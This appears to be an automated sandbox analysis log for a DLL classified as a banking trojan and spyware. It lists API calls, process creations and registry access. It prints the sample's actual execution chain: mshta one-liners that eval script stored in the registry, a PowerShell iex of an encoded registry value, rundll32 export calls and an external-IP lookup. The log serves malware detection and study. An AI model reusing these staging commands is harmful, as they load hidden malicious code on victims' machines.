                      Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_009852A0
                      Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00964AFE
                      Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00982339
                      Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00972499
                      Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00972C07
                      Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0097C5F4
                      Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00965518
                      Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0096AD2E
                      Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00974658
                      Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0096279B
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0456D1F8 CreateProcessAsUserW,
                      Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: C:\Windows\System32\loaddll32.exe Section loaded: mspdb140.dll
                      Source: data.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4B121F NtMapViewOfSection,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4B1A1C SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4B2013 GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4B2495 NtQueryVirtualMemory,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD22EC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD3C64 GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD37E0 NtMapViewOfSection,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD8055 NtQueryVirtualMemory,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0456DE77 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04566EB0 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04567FDD RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04570FA5 NtQueryInformationProcess,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_045692F3 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04575AED memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04561305 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04577419 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0457A42B NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_045736C0 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04576F70 NtQuerySystemInformation,RtlNtStatusToDosError,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04564851 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0456D812 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0456D00C memset,NtQueryInformationProcess,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04564173 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04579180 NtGetContextThread,RtlNtStatusToDosError,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0457DBCE NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BBA42B NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BA6EB0 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB969C memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BADE77 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB0FA5 NtQueryInformationProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BA7FDD RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB680B NtMapViewOfSection,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BA4173 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BA92F3 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB5AED memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BBA21F GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BA1305 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB7419 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB36C0 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB6F70 NtQuerySystemInformation,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BAD812 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BAD00C memset,NtQueryInformationProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BA4851 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB9180 NtGetContextThread,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BBDBCE NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04A722EC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04A78055 NtQueryVirtualMemory,
                      Source: C:\Windows\System32\control.exe Code function: 34_2_0092A8D4 NtWriteVirtualMemory,
                      Source: C:\Windows\System32\control.exe Code function: 34_2_0092B92C NtReadVirtualMemory,
                      Source: C:\Windows\System32\control.exe Code function: 34_2_0093FAA8 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,
                      Source: C:\Windows\System32\control.exe Code function: 34_2_009252DC NtMapViewOfSection,
                      Source: C:\Windows\System32\control.exe Code function: 34_2_00921A58 NtQueryInformationToken,NtQueryInformationToken,NtClose,
                      Source: C:\Windows\System32\control.exe Code function: 34_2_00922B08 NtQueryInformationProcess,
                      Source: C:\Windows\System32\control.exe Code function: 34_2_0092A444 RtlAllocateHeap,NtQueryInformationProcess,
                      Source: C:\Windows\System32\control.exe Code function: 34_2_00947DAC NtCreateSection,
                      Source: C:\Windows\System32\control.exe Code function: 34_2_00940DE0 NtAllocateVirtualMemory,
                      Source: C:\Windows\System32\control.exe Code function: 34_2_0093179C NtSetContextThread,NtUnmapViewOfSection,NtClose,
                      Source: C:\Windows\System32\control.exe Code function: 34_2_0095F002 NtProtectVirtualMemory,NtProtectVirtualMemory,
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67C2B08 NtQueryInformationProcess,
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67C1A58 NtQueryInformationToken,NtQueryInformationToken,NtClose,
                      Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67FF002 NtProtectVirtualMemory,NtProtectVirtualMemory,
                      Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00961305 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
                      Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0096DE77 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00970FA5 NtQueryInformationProcess,
                      Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00967FDD memset,CreateMutexA,CloseHandle,GetUserNameA,RtlAllocateHeap,NtQueryInformationProcess,OpenProcess,CloseHandle,memcpy,RtlAllocateHeap,OpenEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
                      Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0096D812 OpenProcess,GetLastError,NtSetInformationProcess,RtlNtStatusToDosError,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
                      Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0096D00C memset,NtQueryInformationProcess,
                      Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00977419 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00976F70 NtQuerySystemInformation,RtlNtStatusToDosError,
                      Source: aixojixg.dll.20.dr Static PE information: No import functions for PE file found
                      Source: keehvxm3.dll.24.dr Static PE information: No import functions for PE file found
                      Source: a52acufz.dll.19.dr Static PE information: No import functions for PE file found
                      Source: ddwuzigh.dll.23.dr Static PE information: No import functions for PE file found
                      Source: data.dll Binary or memory string: OriginalFilenameSoon.dll8 vs data.dll
                      Source: data.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20211007
                      Source: classification engine Classification label: mal100.bank.troj.spyw.evad.winDLL@53/41@12/1
                      Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
                      Source: data.dll Virustotal: Detection: 7%
                      Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\data.dll'
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\data.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Bonebegin
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\data.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Father
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Ratherdesign
                      Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                      Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dsd4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dsd4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                      Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF604.tmp' 'c:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF652.tmp' 'c:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES20A.tmp' 'c:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47B.tmp' 'c:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP'
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\380E.bi1'
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\380E.bi1'
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\syswow64\cmd.exe' /C pause dll mail, ,
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\data.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Bonebegin
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Father
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Ratherdesign
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\data.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF604.tmp' 'c:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF652.tmp' 'c:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES20A.tmp' 'c:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47B.tmp' 'c:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP'
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\380E.bi1'
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\380E.bi1'
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\syswow64\cmd.exe' /C pause dll mail, ,
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hr4en22c.pth.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00DD11B8 CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,CloseHandle,
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Bonebegin
Source: C:\Windows\System32\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{023FD26A-79F2-8479-1356-BDF8F7EA41AC}
